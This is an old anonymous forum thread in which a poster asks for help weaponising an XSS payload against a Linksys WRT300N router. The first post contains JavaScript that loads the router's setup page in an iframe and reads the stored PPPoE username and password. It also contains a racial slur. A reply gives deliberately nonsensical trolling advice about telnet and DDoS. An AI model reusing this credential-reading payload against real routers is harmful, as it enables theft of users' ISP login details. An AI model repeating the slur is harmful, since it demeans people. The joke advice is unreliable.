Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon.

Pages: 1-

Linksys WRT300N XSS

Name: Anonymous 2008-11-28 4:40

A nigger in /g/ told me to come here. Paste:

I need some help with a router XSS vulnerability. The router is a Linksys WRT300N, and I would like to get this into a working file so I can test it on my router:

var ss = document.createElement('iframe');
ss.src = '/setup.cgi?next_file=Setup.htm';
ss.setAttribute("onload", "test()");
var hh = document.getElementsByTagName('body')[0];
hh.appendChild(ss);

function test() {
var oDoc = (ss.contentWindow || ss.contentDocument);
if (oDoc.document) oDoc = oDoc.document;
var d = ss.contentDocument;
var user = d.getElementsByName("PppoeUserName")[0].value;
var pass = d.getElementsByName("PppoePasswd")[0].value;
alert(user + "-" + pass);
}">

Name: Anonymous 2008-11-28 6:18

Exploiting or securing XSS in linksys routers is a pretty trivial matter. After opening a telnet connection to your gateway, proceed to hax anus and give the upload to the Linksys Iframe, which will append it's children to the document (should be obvious from the script). Alternatively, you can proceed yourself by pasting your ecmascript everywhere in the terminal connection, which should result in ddos which will stop the local internet, giving you the benefits of XSS with none of the crippling psychological costs

Name: Anonymous 2008-11-29 23:51

Telnet doesn't work

Don't change these.
Name: Email:
Entire Thread Thread List